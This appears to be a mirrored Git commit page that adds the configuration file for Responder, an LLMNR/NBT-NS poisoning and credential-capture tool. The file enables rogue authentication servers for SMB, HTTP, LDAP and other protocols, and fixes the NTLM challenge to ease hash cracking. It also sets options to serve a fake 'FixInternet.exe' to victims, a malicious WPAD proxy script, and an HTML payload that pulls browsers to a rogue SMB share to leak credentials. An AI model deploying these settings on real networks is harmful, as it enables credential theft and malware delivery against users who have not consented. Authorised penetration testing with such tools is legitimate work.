mirror of
https://github.com/lgandx/Responder.git
synced 2025-07-31 12:00:19 -07:00
Added: Configuration file for Responder
This commit is contained in:
parent
ff90b786dd
commit
d57310273d
1 changed files with 50 additions and 0 deletions
50
Responder.conf
Normal file
50
Responder.conf
Normal file
|
@ -0,0 +1,50 @@
|
|||
[Responder Core]
|
||||
;;
|
||||
;Set these values to On or Off, so you can control which rogue authentication server is turned on.
|
||||
SQL = On
|
||||
SMB = On
|
||||
FTP = On
|
||||
HTTP = On
|
||||
HTTPS = On
|
||||
DNS = On
|
||||
LDAP = On
|
||||
;
|
||||
;Set a custom challenge
|
||||
Challenge = 1122334455667788
|
||||
;
|
||||
;Set an IP address if you want to bind responder to a specific interface.
|
||||
;Default is 0.0.0.0, which means Responder will listen on all interfaces.
|
||||
Bind_to = 0.0.0.0
|
||||
;
|
||||
;Set this to change the default logging file
|
||||
SessionLog = Responder-Session.log
|
||||
;
|
||||
[HTTP Server]
|
||||
;;
|
||||
;Set this to On if you want to always serve a specific file to the victim.
|
||||
Serve-Always = Off
|
||||
;
|
||||
;Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
|
||||
Serve-Exe = Off
|
||||
;
|
||||
;Uncomment and specify a custom file to serve, the file must exist.
|
||||
Filename = FixInternet.exe
|
||||
;
|
||||
;Specify a custom executable file to serve, the file must exist.
|
||||
ExecFilename = FixInternet.exe
|
||||
;
|
||||
;Set your custom PAC script
|
||||
WPADScript = function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';}
|
||||
;
|
||||
;HTML answer to serve after user authentication.
|
||||
;In this example, we redirect the browser to our rogue SMB server.
|
||||
HTMLToServe = <html><head></head><body><img src='file:\\\\\shar\smileyd.ico' alt='Loading' height='1' width='2'></body></html>
|
||||
;
|
||||
[HTTPS Server]
|
||||
;
|
||||
;Change to use your certs
|
||||
cert = Certs/responder.crt
|
||||
key = Certs/responder.key
|
||||
;
|
||||
|
||||
|
Loading…
Add table
Add a link
Reference in a new issue